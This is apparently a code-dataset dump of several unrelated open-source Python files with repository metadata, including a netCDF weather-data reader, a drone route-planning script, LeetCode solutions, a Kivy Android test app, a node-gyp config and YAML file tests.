# time index before
before = netCDF4.date2index(utc_time, nctime, select='before')
fbefore = self.data[param][before, ilat, ilon]
fafter = self.data[param][before + 1, ilat, ilon]
dt_num = netCDF4.date2num(utc_time, nctime.units)
time_ratio = (dt_num - nctime[before]) / self.delta_time
return fbefore + (fafter - fbefore) * time_ratio
def read_ecmwf_macc(filename, latitude, longitude, utc_time_range=None):
"""
Read data from ECMWF MACC reanalysis netCDF4 file.
Parameters
----------
filename : string
full path to netCDF4 data file.
latitude : float
latitude in degrees
longitude : float
longitude in degrees
utc_time_range : sequence of datetime.datetime
pair of start and stop naive or UTC date-times
Returns
-------
data : pandas.DataFrame
dataframe for specified range of UTC date-times
"""
ecmwf_macc = ECMWF_MACC(filename)
try:
ilat, ilon = ecmwf_macc.get_nearest_indices(latitude, longitude)
nctime = ecmwf_macc.data['time']
if utc_time_range:
start_idx = netCDF4.date2index(
utc_time_range[0], nctime, select='before')
stop_idx = netCDF4.date2index(
utc_time_range[-1], nctime, select='after')
time_slice = slice(start_idx, stop_idx + 1)
else:
time_slice = slice(0, ecmwf_macc.time_size)
times = netCDF4.num2date(nctime[time_slice], nctime.units)
df = {k: ecmwf_macc.data[k][time_slice, ilat, ilon]
for k in ecmwf_macc.keys}
if ECMWF_MACC.TCWV in df:
# convert total column water vapor in kg/m^2 at (1-atm, 25-degC) to
# precipitable water in cm
df['precipitable_water'] = df[ECMWF_MACC.TCWV] / 10.0
finally:
ecmwf_macc.data.close()
return pd.DataFrame(df, index=times.astype('datetime64[s]'))
| [
"cwhanse@sandia.gov"
] | cwhanse@sandia.gov |
539b98bd26642d583bafee631ff62525e4d20ea8 | b97d0cd8afea1e29288904c72f8af8afe9180f3f | /nav.py | d4e6a326e5caed528d0cca9d65ca04d2baaefec3 | [] | no_license | jaeday/dronedeliverysystem | 5dda108ba46653ead4da4a34e90590fca25e938b | 957ab858af1237887a15df865529ba7457952a7c | refs/heads/main | 2023-08-14T03:48:13.912000 | 2021-09-21T17:25:24 | 2021-09-21T17:25:24 | 386,806,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,039 | py | from dataclasses import dataclass
from scipy.spatial import distance
import math
import os
# The input path can be hardcoded as a relative path
# ./routeplanning/outputfiles contains the outputs from the TSP algorithm
# implemented in C++
inputPath = "./routeplanning/outputfiles"
# This is like a C struct / C++ POD struct
@dataclass
class Point:
x: float
y: float
DEBUG = False
class Nav:
def __init__(self) -> None:
self.coords = []
self.rotations = []
self.lastRot = 0.0
"""
Reads the coordinates of every file in the inputPath that follows the
naming convention: "coordsn.txt" (e.g. input0.txt, input10.txt et)
"""
def readCoords(self, i: int) -> None:
filename = inputPath + "/coords" + str(i) + ".txt"
# Opens the input file in read-only mode
coordFile = open(filename, "r")
points = coordFile.readlines()
for point in points:
coordPair = point.split()
p = Point(float(coordPair[0]), float(coordPair[1]))
self.coords.append(p)
# The drone will always begin at point 0 facing north (0°)
# It will always rotate to create a straight-line trajectory before
# travelling anywhere
"""
Returns the rotation required to get the drone from currentCoord to
nextCoord in a straight line.
"""
def calculateRot(self, currentCoord: Point, nextCoord: Point) -> float:
# Cases where rotations can be made in multiples of 90°
# Straight ahead or at the same position
if currentCoord.x == nextCoord.x and currentCoord.y == nextCoord.y or \
currentCoord.x == nextCoord.x and currentCoord.y < nextCoord.y:
return 0
# 90° Clockwise
elif currentCoord.x < nextCoord.x and currentCoord.y == nextCoord.y:
return 90
# 180°
elif currentCoord.x == nextCoord.x and currentCoord.y > nextCoord.y:
return 180
# 90° Counterclockwise4
elif currentCoord.x > nextCoord.x and currentCoord.y == nextCoord.y:
return -90
# Offsets:
# both positive -> 0
# positive x diff, negative y diff -> 90
# negative x diff, positive y diff -> flip sign
# both negative -> -90
xDist = nextCoord.x - currentCoord.x
yDist = nextCoord.y - currentCoord.y
xDistPos = bool(xDist > 0)
yDistPos = bool(yDist > 0)
# The angle of rotation is:
# arctan(|xDist| / |yDist|)
# Note: There is no possibility of dividing by 0 as any
# 0 yDist would have returned as a rotation that is a multiple of 90°
rotAngle = math.degrees(math.atan(math.fabs(xDist) / math.fabs(yDist)))
# Adding the required offset
if xDistPos and yDistPos:
pass
elif xDistPos and not yDistPos:
rotAngle = 180 - rotAngle
elif not xDistPos and yDistPos:
rotAngle *= -1
# not xDistPos and not yDistPos
else:
rotAngle += 180
return rotAngle
"""
Calculates all of the rotations and distances required
to link all of the points in a given input file
"""
def createPath(self) -> None:
for i in range(0, len(self.coords) - 1):
currentCoord = self.coords[i]
nextCoord = self.coords[i + 1]
rotation = self.calculateRot(currentCoord, nextCoord)
self.lastRot = rotation
# Converting Point objects into 2-tuples to be used
# in the distance.euclidean() function
currentCoordPair = (currentCoord.x, currentCoord.y)
nextCoordPair = (nextCoord.x, nextCoord.y)
dist = distance.euclidean(currentCoordPair, nextCoordPair)
self.rotations.append([rotation, dist])
# Appending the opposite of the last rotation to ensure the drone
# points to (relative) 0°N
self.rotations.append([-self.lastRot, 0.0])
# The last link
currentCoord = self.coords[-1]
nextCoord = self.coords[0]
rotation = self.calculateRot(currentCoord, nextCoord)
self.lastRot = rotation
currentCoordPair = (currentCoord.x, currentCoord.y)
nextCoordPair = (nextCoord.x, nextCoord.y)
dist = distance.euclidean(currentCoordPair, nextCoordPair)
self.rotations.append([rotation, dist])
self.rotations.append([-self.lastRot, 0.0])
# Printing the rotations and distances to stdout
# rounded to 2 decimal places
count = 0
for i in self.rotations:
if DEBUG:
print(count, (round(i[0], 2), round(i[1], 2)))
print(str(round(i[0], 2)) + " " + str(round(i[1], 2)))
count += 1
# Counter variable
i = 1
# Wrapper function for the Nav class
for file in os.listdir(inputPath):
n = Nav()
currentFile = os.path.join(inputPath, file)
n.readCoords(i)
i += 1
n.createPath()
| [
"sjaemin@umich.edu"
] | sjaemin@umich.edu |
a7d11fe7ad97288252922c00a7c365e7199665ed | 43e900f11e2b230cdc0b2e48007d40294fefd87a | /Amazon/VideoOnsite/162.find-peak-element.py | 5b3ada63691cf9fcf4b02f7261a2be18b71ec8d7 | [] | no_license | DarkAlexWang/leetcode | 02f2ed993688c34d3ce8f95d81b3e36a53ca002f | 89142297559af20cf990a8e40975811b4be36955 | refs/heads/master | 2023-01-07T13:01:19.598427 | 2022-12-28T19:00:19 | 2022-12-28T19:00:19 | 232,729,581 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | #
# @lc app=leetcode id=162 lang=python3
#
# [162] Find Peak Element
#
# @lc code=start
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
l, r = 0, len(nums) - 1
while l + 1 < r:
mid = (l + r) // 2
if nums[mid] > nums[mid + 1] and nums[mid] > nums[mid - 1]:
return mid
if nums[mid] > nums[mid + 1]:
r = mid
else:
l = mid
if nums[l] < nums[r]:
return r
else:
return l
# @lc code=end
| [
"wangzhihuan0815@gmail.com"
] | wangzhihuan0815@gmail.com |
a4c7d9c19632ad8e7d7c570e772ee1049d061d92 | ec330e2739dbacd39be5f81e6ea44aa856c559f7 | /server/compose/compose_generator.py | 84d29378355e282ad14d0ce5eb6777881c39683e | [] | no_license | unitartu-remrob/remrob-server | 2caeaa882d58e54bfd0b81f07c119358d8f3b63a | 0833a0f8bc3f7bae2fcfdf0a2601ba376321b781 | refs/heads/main | 2023-08-30T14:31:23.754963 | 2023-03-25T10:31:14 | 2023-03-25T10:31:14 | 484,731,849 | 1 | 0 | null | 2022-08-03T13:43:34 | 2022-04-23T11:45:36 | JavaScript | UTF-8 | Python | false | false | 995 | py | import yaml
from jinja2 import Environment, FileSystemLoader
if __name__ == "__main__":
robo_config_macvlan = yaml.safe_load(open('config/config-macvlan.yaml'))
robo_config_local = yaml.safe_load(open('config/config-local.yaml'))
# Load templates file from templtes folder
env = Environment(loader = FileSystemLoader('./templates'), trim_blocks=True, lstrip_blocks=True)
template_macvlan = env.get_template('macvlan.j2')
template_local = env.get_template('local.j2')
for i, robot in enumerate(robo_config_macvlan):
output = template_macvlan.render(
name=robot["name"],
robotont=robot["master-name"],
master_ip=robot["master-ip"],
self_ip=robot["self-ip"]
)
file = open(f"./macvlan/robo-{i+1}.yaml", "w")
file.write(output)
file.close()
for i, robot in enumerate(robo_config_local):
output = template_local.render(
name=robot["name"],
port=robot["port"]
)
file = open(f"./local/robosim-{i+1}.yaml", "w")
file.write(output)
file.close()
| [
"chooky823@gmail.com"
] | chooky823@gmail.com |
5ecceb0860a1e10a08204b9871fd1c2dc693070c | 13ba299b31ef0182c69ed0b175e148c7d824f898 | /Week_1/Chapter_11/section_2_6/exercise_1.py | ab0a54f85be8c15b812e4cd80c54dd9ce64c157b | [] | no_license | Marnix641/advanced_course | ba5d5541dbe2f77dd934f018658848e5b441960e | bf3937c17f50f33f21e0e2f2ecc77da7cb3692d8 | refs/heads/master | 2022-11-08T04:18:44.760994 | 2020-07-02T15:44:08 | 2020-07-02T15:44:08 | 256,275,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from Week_1.Chapter_11.section_1_12.point import Point
from Week_1.Chapter_11.section_2_6.rectangle import Rectangle
r = Rectangle(Point(0, 0), 20, 15)
r.area()
print(r.area()) | [
"m.dekker.18@student.rug.nl"
] | m.dekker.18@student.rug.nl |
04fa896307a6d243658fb915099d337f76804cd5 | 86813bf514f3e0257f92207f40a68443f08ee44b | /0406 根据身高重建队列/0406 根据身高重建队列.py | 989f32ac1430a2408dcaef254410bf9310c75be2 | [] | no_license | Aurora-yuan/Leetcode_Python3 | 4ce56679b48862c87addc8cd870cdd525c9d926c | 720bb530850febc2aa67a56a7a0b3a85ab37f415 | refs/heads/master | 2021-07-12T13:23:19.399155 | 2020-10-21T03:14:36 | 2020-10-21T03:14:36 | 212,998,500 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | #label: 贪心算法 difficulty: medium
"""
思路
1.排序:按照身高从高到低排,升高相同的按k从小到大排
2.插入:按照排序好的顺序逐个插入新数组,插入的位置按照k来插
如示例中,排序完:
[[7,0], [7,1], [6,1], [5,0], [5,2],[4,4]]
插入的过程:
第一插:[[7,0]]
第二插:[[7,0], [7,1]]
第三插:[[7,0], [6,1],[7,1]]
第四插:[[5,0],[7,0], [6,1],[7,1]]
...
先插高的,后插矮的,即使后插的插到前面也不会有影像,因为矮
"""
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key=lambda (h, k): (-h, k))
res = []
for p in people:
res.insert(p[1],p)
return res
| [
"noreply@github.com"
] | Aurora-yuan.noreply@github.com |
1b9b0ce483b3eaacca83d0e2604376ba6a14b1e8 | ce82af15e3318049555292d84249dc64ed70bbc4 | /conda_kapsel/test/test_yaml_file.py | ede797cceb91947bd15029da5d29afb48b0667c2 | [] | no_license | digideskio/kapsel | 2c75d2ce0bd4e546f058640a38099b76f5eefbb8 | 207a3452df2c09ee5bf70770de4ed93afa2d91b9 | refs/heads/master | 2021-01-18T18:26:11.772284 | 2016-07-28T14:15:01 | 2016-09-07T15:31:48 | 67,981,204 | 0 | 1 | null | 2016-09-12T06:15:29 | 2016-09-12T06:15:27 | Python | UTF-8 | Python | false | false | 15,237 | py | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © 2016, Continuum Analytics, Inc. All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# ----------------------------------------------------------------------------
from conda_kapsel.yaml_file import YamlFile
from conda_kapsel.internal.test.tmpfile_utils import with_file_contents, with_directory_contents
import errno
import os
import pytest
def test_read_yaml_file_and_get_value():
def check_abc(filename):
yaml = YamlFile(filename)
assert not yaml.corrupted
assert yaml.corrupted_error_message is None
assert yaml.change_count == 1
# try getting with a list of keys
value = yaml.get_value(["a", "b"])
assert "c" == value
# get a single string as the path
value = yaml.get_value("a")
assert dict(b="c") == value
# get with a tuple to show we aren't list-specific
value = yaml.get_value(("a", "b"))
assert "c" == value
assert yaml.root == dict(a=dict(b='c'))
with_file_contents("""
a:
b: c
""", check_abc)
def test_read_yaml_file_and_get_default():
def check_abc(filename):
yaml = YamlFile(filename)
value = yaml.get_value(["a", "z"], "default")
assert "default" == value
with_file_contents("""
a:
b: c
""", check_abc)
def test_read_empty_yaml_file_and_get_default():
def check_empty(filename):
yaml = YamlFile(filename)
value = yaml.get_value(["a", "z"], "default")
assert "default" == value
with_file_contents("", check_empty)
def test_read_yaml_file_and_get_list_valued_section():
def get_list_value(filename):
yaml = YamlFile(filename)
value = yaml.get_value("a")
assert [1, 2, 3] == value
with_file_contents("""
a: [1,2,3]
""", get_list_value)
def test_read_yaml_file_and_get_default_due_to_missing_section():
def check_abc(filename):
yaml = YamlFile(filename)
value = yaml.get_value(["z", "b"], "default")
assert "default" == value
with_file_contents("""
a:
b: c
""", check_abc)
def test_read_yaml_file_and_get_default_due_to_non_dict_section():
def check_a(filename):
yaml = YamlFile(filename)
value = yaml.get_value(["a", "b"], "default")
assert "default" == value
with_file_contents("""
a: 42
""", check_a)
def test_invalid_path():
def check_bad_path(filename):
yaml = YamlFile(filename)
assert not yaml.corrupted
with pytest.raises(ValueError) as excinfo:
yaml.get_value(42)
assert "YAML file path must be a string or an iterable of strings" in repr(excinfo.value)
with_file_contents("""
a:
b: c
""", check_bad_path)
def test_read_missing_yaml_file_and_get_default_due_to_missing_section():
def check_missing(dirname):
yaml = YamlFile(os.path.join(dirname, "nope.yaml"))
value = yaml.get_value(["z", "b"], "default")
assert "default" == value
with_directory_contents(dict(), check_missing)
def test_read_yaml_file_that_is_a_directory():
def check_read_directory(dirname):
filename = os.path.join(dirname, "dir.yaml")
os.makedirs(filename)
with pytest.raises(IOError) as excinfo:
YamlFile(filename)
import platform
if platform.system() == 'Windows':
assert errno.EACCES == excinfo.value.errno
else:
assert errno.EISDIR == excinfo.value.errno
with_directory_contents(dict(), check_read_directory)
def test_read_yaml_file_and_change_value():
# ruamel.yaml does reformat yaml files a little bit,
# for example it picks its own indentation, even
# as it tries to keep comments and stuff. So
# this test cheats by using input that happens
# to be in the format ruamel.yaml will generate.
# Oh well.
template = """
# this is a comment 1
a:
# this is a comment 2
b: %s
"""
template = template[1:] # chop leading newline
original_value = "c"
original_content = template % (original_value)
changed_value = 42
changed_content = template % (changed_value)
def change_abc(filename):
yaml = YamlFile(filename)
assert yaml.change_count == 1
value = yaml.get_value(["a", "b"])
assert original_value == value
yaml.set_value(["a", "b"], changed_value)
yaml.save()
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
assert changed_content == changed
yaml2 = YamlFile(filename)
assert yaml2.change_count == 1
value2 = yaml2.get_value(["a", "b"])
assert changed_value == value2
with_file_contents(original_content, change_abc)
def test_read_missing_yaml_file_and_set_value():
def set_abc(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
value = yaml.get_value(["a", "b"])
assert value is None
yaml.set_value(["a", "b"], 42)
yaml.save()
assert os.path.exists(filename)
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
expected = """
# yaml file
a:
b: 42
""" [1:]
assert expected == changed
yaml2 = YamlFile(filename)
value2 = yaml2.get_value(["a", "b"])
assert 42 == value2
with_directory_contents(dict(), set_abc)
def test_read_yaml_file_and_add_section():
original_content = """
a:
b: c
"""
def add_section(filename):
yaml = YamlFile(filename)
value = yaml.get_value(["a", "b"])
assert "c" == value
yaml.set_value(["x", "y"], dict(z=42, q="rs"))
assert yaml.change_count == 1
yaml.save()
assert yaml.change_count == 2
yaml2 = YamlFile(filename)
value2 = yaml2.get_value(["a", "b"])
assert "c" == value2
added_value = yaml2.get_value(["x", "y", "z"])
assert 42 == added_value
added_value_2 = yaml2.get_value(["x", "y", "q"])
assert "rs" == added_value_2
print(open(filename, 'r').read())
with_file_contents(original_content, add_section)
def test_transform_yaml():
def transform_test(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
assert yaml.change_count == 1
# save so we aren't dirty due to nonexistent file
yaml.save()
assert os.path.exists(filename)
assert yaml.change_count == 2
def transformer(tree):
tree['foo'] = dict()
tree['foo']['bar'] = 42
assert not yaml._dirty
yaml.transform_yaml(transformer)
assert yaml._dirty
yaml.save()
assert yaml.change_count == 3
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
expected = """
# yaml file
foo:
bar: 42
""" [1:]
assert expected == changed
yaml2 = YamlFile(filename)
value2 = yaml2.get_value(["foo", "bar"])
assert 42 == value2
with_directory_contents(dict(), transform_test)
def test_transform_yaml_does_nothing():
def transform_test(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
assert yaml.change_count == 1
# save so we aren't dirty due to nonexistent file
yaml.save()
assert yaml.change_count == 2
assert os.path.exists(filename)
def transformer(tree):
# return True means don't make changes after all
return True
assert not yaml._dirty
yaml.transform_yaml(transformer)
assert not yaml._dirty
yaml.save()
assert yaml.change_count == 2
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
expected = """
# yaml file
{}
""" [1:]
assert expected == changed
with_directory_contents(dict(), transform_test)
def test_multiple_saves_ignored_if_not_dirty():
def check_dirty_handling(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
assert yaml.change_count == 1
yaml.set_value(["a", "b"], 42)
yaml.save()
assert yaml.change_count == 2
assert os.path.exists(filename)
time1 = os.path.getmtime(filename)
yaml.save()
assert time1 == os.path.getmtime(filename)
assert yaml.change_count == 2
yaml.save()
assert time1 == os.path.getmtime(filename)
assert yaml.change_count == 2
yaml.set_value(["a", "b"], 43)
assert time1 == os.path.getmtime(filename)
assert yaml.change_count == 2
yaml.save()
# OS mtime resolution might leave these equal
assert time1 <= os.path.getmtime(filename)
assert yaml.change_count == 3
with_directory_contents(dict(), check_dirty_handling)
def test_save_ignored_if_not_dirty_after_load():
def check_dirty_handling(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
yaml.set_value(["a", "b"], 42)
yaml.save()
assert os.path.exists(filename)
time1 = os.path.getmtime(filename)
yaml2 = YamlFile(filename)
assert time1 == os.path.getmtime(filename)
assert yaml2.change_count == 1
yaml2.save()
assert time1 == os.path.getmtime(filename)
assert yaml2.change_count == 1
with_directory_contents(dict(), check_dirty_handling)
def test_throw_if_cannot_create_directory(monkeypatch):
def mock_makedirs(path, mode=0):
raise IOError("this is not EEXIST")
monkeypatch.setattr("os.makedirs", mock_makedirs)
def check_throw_if_cannot_create(dirname):
subdir = "bar"
filename = os.path.join(dirname, subdir, "foo.yaml")
yaml = YamlFile(filename)
yaml.set_value(["a", "b"], 42)
with pytest.raises(IOError) as excinfo:
yaml.save()
assert "this is not EEXIST" in repr(excinfo.value)
with_directory_contents(dict(), check_throw_if_cannot_create)
def test_read_corrupted_yaml_file():
def check_corrupted(filename):
yaml = YamlFile(filename)
assert yaml.corrupted
assert "mapping values are not allowed here" in yaml.corrupted_error_message
# it should raise an exception if you try to modify
with pytest.raises(ValueError) as excinfo:
yaml.set_value(["foo", "bar"], 42)
assert "Cannot modify corrupted" in repr(excinfo.value)
with pytest.raises(ValueError) as excinfo:
yaml.save()
assert "Cannot modify corrupted" in repr(excinfo.value)
with pytest.raises(ValueError) as excinfo:
def make_changes(yaml):
return False
yaml.transform_yaml(make_changes)
assert "Cannot modify corrupted" in repr(excinfo.value)
# the file should appear empty if you try to get anything,
# but it shouldn't throw
assert yaml._yaml is not None
assert yaml.get_value(["a", "b"]) is None
with_file_contents("""
^
a:
b: c
""", check_corrupted)
def test_roundtrip_yaml_file_preserving_order_and_comments():
original_content = """
# comment in front of a
a:
x: y
# comment in front of z
z: q
b:
i: j
# whitespace in front of this comment in front of k
k: l
c:
# comment before a list item
- foo
- bar # comment after a list item
d:
hello: world
foo: bar
e:
woot: woot
# comment at the end of e
# comment in column 0 at the end
# this one is a block comment
# which continues several lines
"""
def check_roundtrip(filename):
yaml = YamlFile(filename)
yaml._dirty = True
yaml.save()
new_content = open(filename, 'r').read()
print("the re-saved version of the file was:")
print(new_content)
assert original_content != new_content
# We don't require that the YAML backend preserves every
# formatting detail, but it can't reorder things or lose
# comments because if it did users would be annoyed.
# Minor whitespace changes are OK, though ideally we'd
# avoid even those.
def canonicalize(content):
if content.startswith("\n"):
content = content[1:]
return content.replace(" ", "").replace("\n\n", "\n")
original_canon = canonicalize(original_content)
new_canon = canonicalize(new_content)
assert original_canon == new_canon
with_file_contents(original_content, check_roundtrip)
def test_read_yaml_file_and_unset_values():
# testing single-item dict, two-item dict, and toplevel value
original_content = """
a:
b: 1
x:
y: 2
z: 3
q: 4
"""
def unset_values(filename):
yaml = YamlFile(filename)
assert yaml.change_count == 1
a_b = yaml.get_value(["a", "b"])
assert 1 == a_b
x_y = yaml.get_value(["x", "y"])
assert 2 == x_y
x_z = yaml.get_value(["x", "z"])
assert 3 == x_z
q = yaml.get_value("q")
assert 4 == q
def assert_unset_on_reload(path):
yaml2 = YamlFile(filename)
assert yaml2.change_count == 1
value2 = yaml2.get_value(path, None)
assert value2 is None
scope = dict(last_change=yaml.change_count)
def check_unset(path):
assert yaml.change_count == scope['last_change']
assert not yaml._dirty
yaml.unset_value(path)
assert yaml.get_value(path, None) is None
assert yaml._dirty
yaml.save()
assert yaml.change_count == (scope['last_change'] + 1)
scope['last_change'] += 1
assert_unset_on_reload(path)
check_unset(["a", "b"])
check_unset(["x", "y"])
check_unset(["x", "z"])
check_unset("q")
assert not yaml._dirty
yaml.unset_value("not_in_there")
assert not yaml._dirty
with_file_contents(original_content, unset_values)
def test_read_yaml_file_and_set_get_empty_string():
def check(filename):
yaml = YamlFile(filename)
assert not yaml.corrupted
assert yaml.corrupted_error_message is None
assert yaml.change_count == 1
value = yaml.get_value("a", None)
assert value is None
yaml.set_value("a", '')
value = yaml.get_value("a", None)
assert value == ''
# only-whitespace string
yaml.set_value("a", ' ')
value = yaml.get_value("a", None)
assert value == ' '
with_file_contents("", check)
| [
"hp@pobox.com"
] | hp@pobox.com |
963b0a84d3f5586261ec0ed22a68007f2a76aa70 | 0a1356b97465cc1d5c3f661f61b3b8c51fb05d46 | /android_binding/.buildozer/android/platform/python-for-android/testapps/testapp/main.py | 5baa420f3c203147e6abbfe8085c24a0a8778493 | [
"MIT",
"Python-2.0"
] | permissive | Rohan-cod/cross_platform_calc | 00360f971e4da68dd36d6836c9ddbb157f6b77d5 | 5785a5e8150d174019b330c812e7eb012cc4dd79 | refs/heads/master | 2022-12-22T10:29:05.317051 | 2021-06-05T10:52:44 | 2021-06-05T10:52:44 | 237,465,912 | 2 | 1 | MIT | 2022-12-09T05:18:55 | 2020-01-31T16:07:31 | C | UTF-8 | Python | false | false | 4,015 | py | print('main.py was successfully called')
import os
print('imported os')
print('this dir is', os.path.abspath(os.curdir))
print('contents of this dir', os.listdir('./'))
import sys
print('pythonpath is', sys.path)
import kivy
print('imported kivy')
print('file is', kivy.__file__)
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import StringProperty
from kivy.uix.popup import Popup
from kivy.clock import Clock
print('Imported kivy')
from kivy.utils import platform
print('platform is', platform)
kv = '''
#:import Metrics kivy.metrics.Metrics
#:import sys sys
<FixedSizeButton@Button>:
size_hint_y: None
height: dp(60)
ScrollView:
GridLayout:
cols: 1
size_hint_y: None
height: self.minimum_height
FixedSizeButton:
text: 'test pyjnius'
on_press: app.test_pyjnius()
Image:
keep_ratio: False
allow_stretch: True
source: 'colours.png'
size_hint_y: None
height: dp(100)
Label:
height: self.texture_size[1]
size_hint_y: None
font_size: 100
text_size: self.size[0], None
markup: True
text: '[b]Kivy[/b] on [b]SDL2[/b] on [b]Android[/b]!'
halign: 'center'
Label:
height: self.texture_size[1]
size_hint_y: None
text_size: self.size[0], None
markup: True
text: sys.version
halign: 'center'
padding_y: dp(10)
Widget:
size_hint_y: None
height: 20
Label:
height: self.texture_size[1]
size_hint_y: None
font_size: 50
text_size: self.size[0], None
markup: True
text: 'dpi: {}\\ndensity: {}\\nfontscale: {}'.format(Metrics.dpi, Metrics.density, Metrics.fontscale)
halign: 'center'
FixedSizeButton:
text: 'test ctypes'
on_press: app.test_ctypes()
FixedSizeButton:
text: 'test numpy'
on_press: app.test_numpy()
Widget:
size_hint_y: None
height: 1000
on_touch_down: print('touched at', args[-1].pos)
<ErrorPopup>:
title: 'Error'
size_hint: 0.75, 0.75
Label:
text: root.error_text
'''
class ErrorPopup(Popup):
error_text = StringProperty('')
def raise_error(error):
print('ERROR:', error)
ErrorPopup(error_text=error).open()
class TestApp(App):
def build(self):
root = Builder.load_string(kv)
Clock.schedule_interval(self.print_something, 2)
# Clock.schedule_interval(self.test_pyjnius, 5)
print('testing metrics')
from kivy.metrics import Metrics
print('dpi is', Metrics.dpi)
print('density is', Metrics.density)
print('fontscale is', Metrics.fontscale)
return root
def print_something(self, *args):
print('App print tick', Clock.get_boottime())
def on_pause(self):
return True
def test_pyjnius(self, *args):
try:
from jnius import autoclass
except ImportError:
raise_error('Could not import pyjnius')
return
print('Attempting to vibrate with pyjnius')
# PythonActivity = autoclass('org.renpy.android.PythonActivity')
# activity = PythonActivity.mActivity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
activity = PythonActivity.mActivity
Intent = autoclass('android.content.Intent')
Context = autoclass('android.content.Context')
vibrator = activity.getSystemService(Context.VIBRATOR_SERVICE)
vibrator.vibrate(1000)
def test_ctypes(self, *args):
import ctypes
def test_numpy(self, *args):
import numpy
print(numpy.zeros(5))
print(numpy.arange(5))
print(numpy.random.random((3, 3)))
TestApp().run()
| [
"rohaninjmu@gmail.com"
] | rohaninjmu@gmail.com |
4159b4e566f28b6eb342aa69e94e92358c2909df | 1507c045f1ceec9d73c0fc71e520c3e561461e1b | /node_modules/binaryjs/node_modules/streamws/build/config.gypi | cb18c71e586dda92524b900990c70b0dfc622c81 | [
"MIT"
] | permissive | jimmychimmyy/KandiTag-Backend | bfa5523d7a25e3d9e5d761a0c3b76d1b17e928c3 | aa1a908fe25002565f7504e37881f755c4658813 | refs/heads/master | 2021-05-29T12:52:57.203778 | 2015-08-29T23:08:11 | 2015-08-29T23:08:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,108 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/Users/Jim/.node-gyp/0.10.32",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"viewer": "man",
"browser": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"shell": "/bin/bash",
"init_author_url": "",
"shrinkwrap": "true",
"parseable": "",
"init_license": "ISC",
"email": "",
"sign_git_tag": "",
"init_author_email": "",
"cache_max": "Infinity",
"long": "",
"local_address": "",
"git_tag_version": "true",
"cert": "",
"npat": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"versions": "",
"message": "%s",
"key": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"proprietary_attribs": "true",
"fetch_retry_mintimeout": "10000",
"json": "",
"https_proxy": "",
"engine_strict": "",
"description": "true",
"userconfig": "/Users/Jim/.npmrc",
"init_module": "/Users/Jim/.npm-init.js",
"user": "501",
"node_version": "0.10.32",
"save": "",
"editor": "vi",
"tag": "latest",
"global": "",
"username": "",
"optional": "true",
"force": "",
"bin_links": "true",
"searchopts": "",
"depth": "Infinity",
"searchsort": "name",
"rebuild_bundle": "true",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"save_prefix": "^",
"ca": "",
"save_exact": "",
"group": "20",
"fetch_retry_factor": "10",
"dev": "",
"version": "",
"cache_lock_stale": "60000",
"cache_min": "10",
"searchexclude": "",
"cache": "/Users/Jim/.npm",
"color": "true",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "npm/1.4.28 node/v0.10.32 darwin x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "18",
"init_author_name": "",
"git": "git",
"unsafe_perm": "",
"tmp": "/tmp",
"onload_script": "",
"prefix": "/usr/local",
"link": ""
}
}
| [
"jimmychimmyy@gmail.com"
] | jimmychimmyy@gmail.com |
c9d0a1287699c68e80691464c75983561dfea3f4 | 944d4bdedaf892ae2487f43715c5f1fd5b7b44c4 | /party/xadmin/views/edit.py | 34df9ecf4115017bce3d576a84aadfb416c2fdac | [] | no_license | laomd-2/partybuilding | c7d5076fd7803f09a4e955cb2aecf7b07b00f4d7 | 18cd80da82db4c873027d2d890fa8c83bcaf6e0b | refs/heads/master | 2021-06-23T10:40:37.280590 | 2020-03-22T12:40:38 | 2020-03-22T12:41:11 | 168,854,119 | 0 | 1 | null | 2021-06-10T21:23:46 | 2019-02-02T16:53:46 | TSQL | UTF-8 | Python | false | false | 20,635 | py | from __future__ import absolute_import
import copy
